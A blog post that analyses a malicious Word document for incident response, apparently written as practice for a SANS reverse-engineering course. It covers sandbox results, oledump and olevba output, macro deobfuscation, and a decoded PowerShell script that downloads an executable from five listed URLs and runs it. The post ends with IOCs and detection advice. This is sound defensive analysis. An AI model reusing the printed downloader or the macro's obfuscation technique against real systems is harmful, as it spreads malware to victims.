FOR610: Reverse-Engineering Malware
I attended SANS FOR610: Reverse-Engineering Malware, taught by Jess Garcia in Copenhagen (Sep-17). I’m now studying for the certification and practising on captured malware samples. In this post I go through
- Using public (OSINT) information;
- Behavioural analysis with sandboxes (via a public malware sandbox);
- Malicious Office documents.
Note that the purpose of the exercise is not to understand every line of code in the malware in detail. The analysis is done from an incident response point of view, with the goal of extracting useful Indicators of Compromise (IOCs), gaining a basic understanding of the malware and assessing its impact.
MZZP3648741.doc
A spam e-mail message that I received included a link (not an attachment) pointing to a Word document. The details of the Word document:
Filename: MZZP3648741.doc
Size: 75776 bytes
MD5: 1a4471c427c7b4d87f3edf0c150e4c89
Public / OSINT information
I downloaded the file on Mon 9-Oct-2017 and looked up its MD5 hash on VirusTotal (search by hash instead of uploading the file). VirusTotal already knew the file: 27 out of 60 AV engines detected it (upload time was 2017-10-09 14:37:31 UTC).
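Computing the hash locally is enough to do that lookup. A minimal sketch, assuming Python 3 is available on the analysis machine; the function names are my own and not part of any tool used in this post:

```python
import hashlib
import io


def md5_of_stream(stream, chunk_size=65536):
    """Return the hex MD5 of a binary stream, read in chunks."""
    digest = hashlib.md5()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def md5_of_file(path):
    """Return the hex MD5 of the file at 'path' without loading it whole."""
    with open(path, "rb") as handle:
        return md5_of_stream(handle)


if __name__ == "__main__":
    # Demo on in-memory bytes; for a sample you would call md5_of_file(path).
    print(md5_of_stream(io.BytesIO(b"abc")))
```

The resulting hex string can be pasted into the VirusTotal search box, so the sample itself never leaves the lab.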
Note that the filename by which I got the sample (MZZP3648741) was not listed under the file names already seen by VirusTotal.
Based on VirusTotal you can already conclude that this sample
- May try to run other files, shell commands or applications;
- Makes use of macros;
- Was already analysed by a sandbox (via the VirusTotal community comments).
Analyse the sample with a sandbox
The report from VirusTotal told us that there is already a public sandbox report available via VxStream but I wanted to use my account with VMRay to analyse the behaviour of this file in another sandbox.
VMRay gives me a couple of screenshots of the running sample. Based on the screenshots I can conclude that the document tries to lure the user into enabling content (enable the macro to start).
The sandbox shows that Word starts a PowerShell script, which in turn spawns a couple of executables.
c:\users\hjrd1koky ds8lujv\appdata\local\temp\59488.exe (Created File)
c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\evtlaunch.exe (Created File) MD5: cffa5435c773932a8ef271a762ce7cfb
c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\hhgqj.exe (Created File) MD5: 710a2d061953888d8efb6994c976b543
The PE header of the last exe contains a very recent compile time.
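The compile time lives in the TimeDateStamp field of the COFF header. The sketch below shows one way to read it by hand, assuming the raw bytes of the exe are available; the function name is hypothetical, and keep in mind that this field can be forged, so treat it as a hint rather than proof.

```python
import struct
from datetime import datetime, timezone


def pe_compile_time(data):
    """Return the COFF TimeDateStamp of a PE image as a UTC datetime."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew at offset 0x3C holds the file offset of the PE signature.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # Signature (4 bytes) + Machine (2) + NumberOfSections (2) = 8 bytes.
    (timestamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return datetime.fromtimestamp(timestamp, tz=timezone.utc)


if __name__ == "__main__":
    # Synthetic header for demonstration only, not a real sample.
    image = bytearray(0x100)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)
    image[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<I", image, 0x88, 1507500000)
    print(pe_compile_time(bytes(image)).isoformat())
```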
Based on the functions
- GetVolumeInformation
- GetEnvironmentStrings
- GetComputerName
- GetUserDefaultUILanguage
- SetupLogFile (from SETUPAPI.dll)
it is likely that the final exe (hhgqj.exe) is some sort of information stealer.
The VMRay analysis also provides the network indicators
matteostocchino.com/OpwqY/
66.147.244.177
198.1.78.129
46.4.67.203
147.135.209.118
As the purpose of the exercise is to practice skills I will also manually analyse the Word document.
Malicious Office documents
Deciding what are the important streams in an Office document
Oledump tells us that the file contains a stream (8) with a VBA macro.
oledump.py MZZP3648741.doc
We can use olevba to get more info on the macro and document. It will tell us that
- when we open the document the macro autoopen will autostart (auto execute)
- there’s a possible suspicious shell command
- streams ‘Macros/VBA/ThisDocument’ and ‘Macros/VBA/Module1’ contain information that we should further analyse
olevba.py MZZP3648741.doc -a
Now let’s have a look at ‘Macros/VBA/ThisDocument’ (stream 9).
oledump.py MZZP3648741.doc -s 9 -v
oledump.py MZZP3648741.doc -s 8 -v -a
Analysing the VBA code
The VBA macro contains two functions and two subs (FYI : functions return a value, a sub doesn’t). None of the functions or subs use arguments.
The previous analysis showed that the sub autoopen is called when the document is opened. The VBA code in autoopen() (and in the other functions and subs) is obfuscated with assignments that look like lists of ASCII values but are nothing more than arithmetic sums.
Sub autoopen()
avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72
epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81
tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59
ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95
HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79
DyEAfVFbGY
tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79
wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89
UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66
rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62
ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73
NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63
VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66
End Sub
Removing the obfuscation leaves a number of variable assignments and a call to the sub DyEAfVFbGY. Apart from the visual obfuscation I cannot see a reason for the variable assignments (avrPreFPA, XsdndfxXk, etc.); as far as I can tell they do not influence the flow of the code.
avrPreFPA = 1553
XsdndfxXk = 1284
epHeyVxU = 1309
tzyGYTAbft = 1617
ynpsKeY = 1981
HrgnxUf = 1292
Call sub DyEAfVFbGY
tFFBpbzEVBD = 2179
wWxbdvzHZu = 1965
UwkSNDsM = 1248
rBfuFxXEn = 1385
ZNZYbtVGX = 1936
NDwLRskNRm = 1292
VCLfrCtNZC = 1506
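Folding these sums by hand gets tedious quickly. A small sketch of how it could be automated, assuming the macro source has been saved as text with one statement per line; the helper name and the regular expression are mine, and only the first few lines of autoopen() are included:

```python
import re

# A few lines copied from autoopen(); the bare name is the sub call.
OBFUSCATED = """\
avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72
DyEAfVFbGY
epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81
"""

# Matches "name = n + n + ... + n" where every term is a plain integer.
ASSIGNMENT = re.compile(r"^(\w+)\s*=\s*(\d+(?:\s*\+\s*\d+)*)$")


def fold_sums(source):
    """Replace each integer-sum assignment by its total; keep other lines."""
    folded = []
    for line in source.splitlines():
        line = line.strip()
        match = ASSIGNMENT.match(line)
        if match:
            name, expression = match.groups()
            total = sum(int(term) for term in expression.split("+"))
            folded.append(f"{name} = {total}")
        else:
            folded.append(line)
    return folded


if __name__ == "__main__":
    print("\n".join(fold_sums(OBFUSCATED)))
```

Lines that are not pure integer sums, such as the call to DyEAfVFbGY, pass through untouched, which makes the one statement that matters stand out.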
Jumping to the sub DyEAfVFbGY results in code with similar visual obfuscation and a call to the function SMUpGxrua. If we deobfuscate the code we end up with a function definition of
Function SMUpGxrua()
hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " "
Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
End Function
That’s a lot of variables, and none of them has been assigned a value or has a related function/sub, except one: TxxdszysVP. In VBA an unassigned variable is Empty, which concatenates as an empty string, so these names add nothing to the result. The function TxxdszysVP uses the same visual obfuscation and, after deobfuscation, contains
Function TxxdszysVP()
AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm
TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC
End Function
In VBA a function returns a value by assigning it to the function’s own name, so we need to look at where TxxdszysVP is assigned a value. Besides the obfuscation, that assignment contains ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv).
What is AKMnVPdkUnv? This value has been defined previously and, after deobfuscation, contains the string “comments” (“comme” + “nts”).
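The same result can be reached mechanically. The sketch below assumes that every bare identifier in the expression is unassigned (and therefore contributes an empty string), which holds for this macro but is not a general VBA evaluator; the helper name is hypothetical and the expression is shortened to a few of the filler variables.

```python
import re

# Matches a double-quoted VBA string literal (doubled-quote escapes not handled).
STRING_LITERAL = re.compile(r'"([^"]*)"')


def literal_value(expression):
    """Join the string literals of a concatenation, treating all names as empty."""
    return "".join(STRING_LITERAL.findall(expression))


# Shortened version of the AKMnVPdkUnv assignment from TxxdszysVP().
EXPRESSION = (
    '"" + UFFEwZp + MermscARvf + vWCsuwR + "comme" + UFFEwZp + '
    'MermscARvf + vWCsuwR + "nts" + UFFEwZp + vWCsuwR + cYwdSEuMaLm'
)

if __name__ == "__main__":
    print(literal_value(EXPRESSION))
```

This shortcut must not be applied to expressions containing real function calls such as Mid(...) or BuiltInDocumentProperties(...), because those do contribute to the final string.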
So, after removing all the obfuscation we can conclude that the VBA code reads the Comments property of the Office document.
How do you extract the document properties (including the comments)? With oledump!
oledump.py MZZP3648741.doc -M
The output of this command shows a lot of “weird” characters in the comments section. That’s also the section that is referenced by the VBA code. The last part of the comments section shows ‘==’. Why not use the base64dump utility to parse the output?
oledump.py MZZP3648741.doc -M | base64dump.py -d -s 7
The output looks like code that uses string manipulation to build a PowerShell command. On the VBA side, the launcher is assembled through string manipulation (three Mid calls plus "e") and started with the Shell command, whose second argument 0 (vbHide) hides the window.
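To make the Mid slicing concrete, here is a sketch that emulates it in Python. The comments value is a hypothetical stand-in, not the real property content: I assume that the three slices (2 + 4 + 6 characters) spell "powershell -", so that together with "e" the macro builds "powershell -e ", and that everything from position 40 onwards is the encoded payload. The demo payload is also invented.

```python
import base64


def mid(text, start, length=None):
    """Emulate VBA's Mid(): 'start' is 1-based, 'length' is optional."""
    begin = start - 1
    return text[begin:] if length is None else text[begin:begin + length]


def make_hypothetical_comments(payload):
    """Build a stand-in Comments value: 39 filler characters, then the payload."""
    filler = list("#" * 39)
    # Assumed placement of the fragments at the positions the macro slices.
    for start, fragment in ((1, "po"), (11, "wers"), (23, "hell -")):
        filler[start - 1:start - 1 + len(fragment)] = fragment
    return "".join(filler) + payload


# PowerShell's -EncodedCommand takes base64 over UTF-16LE text.
payload = base64.b64encode("Write-Host 'hello'".encode("utf-16-le")).decode("ascii")
comments = make_hypothetical_comments(payload)

# Same slicing as in SMUpGxrua(), with the empty filler variables left out.
launcher = mid(comments, 1, 2) + mid(comments, 11, 4) + mid(comments, 23, 6) + "e" + " "
command_line = launcher + mid(comments, 40)
decoded = base64.b64decode(mid(comments, 40)).decode("utf-16-le")

if __name__ == "__main__":
    print(launcher)
    print(decoded)
```

Spreading the fragments over the property value means the word "powershell" never appears as one string in the macro or in the document metadata.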
The easiest way to debug Powershell code is by using Powershell ISE.
The last part of the code is |invOkE-ExprEssiON. We can print the code that would be executed by replacing it with Write-Host.
The printed code creates a web client object and loops over a list of download URLs.
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://matteostocchino.com/OpwqY/,http://damanidigital.com/w/,http://on-int.com/JJEKjn/,http://ardentfilms.com/WuU/,http://markjgriffin.ie/Iy/'.Split(',');
$name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';
foreach($url in $urls){
  try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}
  catch{write-host $_.Exception.Message;}
}
This code tries 5 different sites in turn until a download succeeds. The retrieved exe is stored in the temp directory under a random number as filename (1 to 65535, because the upper bound of Random.Next is exclusive) and is then started. At the time of writing, only one site was still active.
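Pulling the network indicators out of the decoded script can be scripted as well. A minimal sketch using only the standard library; the pattern and function names are my own, and the third URL is taken to be http://on-int.com/JJEKjn/, on the assumption that any whitespace inside it in a copied listing is a wrapping artifact.

```python
import re
from urllib.parse import urlsplit

# The $urls assignment from the decoded PowerShell script.
DECODED_SCRIPT = (
    "$urls = 'http://matteostocchino.com/OpwqY/,http://damanidigital.com/w/,"
    "http://on-int.com/JJEKjn/,http://ardentfilms.com/WuU/,"
    "http://markjgriffin.ie/Iy/'.Split(',');"
)

# A URL ends at whitespace, a comma or a quote in this script.
URL_PATTERN = re.compile(r"https?://[^\s,'\"]+")


def extract_urls(script):
    """Return all http(s) URLs found in the script text, in order."""
    return URL_PATTERN.findall(script)


def hostnames(urls):
    """Return the sorted, de-duplicated hostnames of the given URLs."""
    return sorted({urlsplit(url).hostname for url in urls})


if __name__ == "__main__":
    for host in hostnames(extract_urls(DECODED_SCRIPT)):
        print(host)
```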
MD5 (index.html.exe) = cffa5435c773932a8ef271a762ce7cfb
Verifying conclusions from manual analysis with sandbox analysis
Based on the sandbox analysis we would have concluded that the file 59488 would be an IOC. However, analysing the actual code shows that this filename was randomly generated. The code also showed that next to the network IOC detected by VMRay there were 4 other URLs included.
- The filename is a randomly generated number from 1 to 65535 (Random.Next excludes its upper bound of 65536);
- 5 different URLs are used to download a second stage of the malware.
In this case, the manual analysis cost more time but gave more detailed results. The information on the random file name could also have been deduced by running the sample several times in a sandbox (in VMRay the sample was automatically analyzed 4 times, with 4 different MS Office versions).
Summary flow of the Office document
The workflow of the document was
- Lure user into enabling macro
- Obfuscated macro, autoopen() starts when macros are enabled
- Different Subs / Functions, call to the comment property of the Office document
- Comments property contains base64 encoded Powershell
- Powershell script uses string manipulation to create and execute a web client object
- Web client downloads exe and stores it with a random filename
Summary IOCs
Detection can be based on
- The network information found in the PowerShell script
- Newly created executables in the temp directory whose name is a number from 1 to 65535 (for example 59488.exe)
- Launch of PowerShell from the Word process
Ideally the network IOCs are added to the IDS and the DNS firewall (blackhole DNS zone).
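The two host-based indicators can be turned into simple checks. This is only a sketch of the matching logic, assuming you already have file-creation and process-creation events from some endpoint log source; the function names are hypothetical, and the numeric range uses 65535 because the upper bound passed to Random.Next is exclusive.

```python
import re

# A numeric .exe name directly under a temp directory, e.g. ...\temp\59488.exe
DROPPED_EXE = re.compile(r"\\temp\\(\d{1,5})\.exe$", re.IGNORECASE)


def is_candidate_dropper_path(path):
    """True if the path looks like <temp>\\<number 1..65535>.exe."""
    match = DROPPED_EXE.search(path)
    return bool(match) and 1 <= int(match.group(1)) <= 65535


def is_suspicious_spawn(parent_image, child_image):
    """True if Word is the parent process of PowerShell."""
    parent = parent_image.lower().rsplit("\\", 1)[-1]
    child = child_image.lower().rsplit("\\", 1)[-1]
    return parent == "winword.exe" and child == "powershell.exe"


if __name__ == "__main__":
    print(is_candidate_dropper_path(
        r"c:\users\hjrd1koky ds8lujv\appdata\local\temp\59488.exe"))
```

A numeric filename in the temp directory is a weak signal on its own, so it is probably best combined with the Word to PowerShell parent/child relation.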
Analyzing cffa5435c773932a8ef271a762ce7cfb
The analysis of the file downloaded via the PowerShell script will be covered in a follow-up post. Based on the information from VirusTotal and VxStream this is an Emotet sample.
Hi Koen, great article, thanks for sharing this information. I was at Brucon a few weeks ago and took a session called Malware Triage by Sean Wilson and Sergei Frankoff from openanalysis.net. They shared a lot of interesting things that you might find useful, like the Sublime editor and CyberChef for various decoding tasks (https://gchq.github.io/CyberChef/)
Cheers, mitch
Hi Mitch,
Thank you for the info. Already a happy user of CyberChef ;-).
Will look into the slides of that presentation, especially for info on Sublime Editor. Thanks!
Koen
That is too gud .
We welcome yr next article .
Thanks man